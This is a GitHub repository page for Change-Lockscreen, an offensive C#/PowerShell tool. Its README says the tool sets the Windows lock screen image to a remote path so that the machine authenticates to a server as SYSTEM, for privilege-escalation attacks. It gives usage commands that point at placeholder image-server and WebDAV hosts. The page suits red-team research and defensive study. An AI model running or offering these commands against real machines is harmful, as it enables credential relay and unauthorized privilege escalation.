Skip to content
Offensive tool to trigger network authentications as SYSTEM
C# PowerShell
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
Change-Lockscreen project files moved from gitlab Aug 2, 2019
Change-Lockscreen.ps1
LICENSE Create LICENSE Aug 12, 2019
README.md

README.md

Change-Lockscreen

Change-Lockscreen is a tool to trigger network authentications as SYSTEM by changing the Windows lock screen image from the command line to perform privilege escalation attacks such as the one described in the post linked below:

Features

By default, Windows 10 has a feature called Windows Spotlight. It downloads and displays lock screen images automatically.

  • When this feature is enabled, Change-Lockscreen will disable it and establish the image specified in the arguments
  • Otherwise if the user has a custom lock screen image, Change-Lockscreen will be in charge to run a backup of it, trigger the network authentication, and establish it again

Note: while the PowerShell version of the tool works reliably, the C# version sometimes fails to restore the original image.

Usage

Change-Lockscreen -FullPath \\[imageserver]@[port]\[fakePath]\[image.jpg]
Change-Lockscreen -Webdav \\[imageserver]@[port]\ 

Watch the video

Authors

  • Simone Salucci
  • Daniel López Jiménez

Acknowledgements

You can’t perform that action at this time.